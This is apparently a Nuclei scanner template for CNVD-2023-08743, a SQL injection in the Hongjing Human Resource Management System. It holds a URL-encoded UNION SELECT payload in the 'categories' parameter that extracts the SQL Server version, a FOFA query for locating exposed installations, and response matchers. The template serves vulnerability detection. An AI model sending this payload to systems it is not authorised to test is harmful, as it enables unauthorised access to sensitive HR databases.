id: CNVD-2023-08743

info:
  name: Hongjing Human Resource Management System - SQL Injection
  author: SleepingBag945
  severity: critical
  description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information.
  reference:
    - https://www.henry4e36.top/index.php/archives/162.html
    - https://blog.csdn.net/qq_41904294/article/details/130944159
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="人力资源信息管理系统"
  tags: HJSoft-HCM

http:
  - raw:
      - |
        GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/xml")'
          - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")'
        condition: and

# digest: 4b0a00483046022100bf751b2abd8d57fb41700237420e6614f9e1cd5cfecaa91d42a7a4bd627f528a022100aa57203f2f66de60ca8a864c13f210e134a55990c97f44c1cabeb436ecb7c4a2:922c64590222798bb761d5b6d8e72950
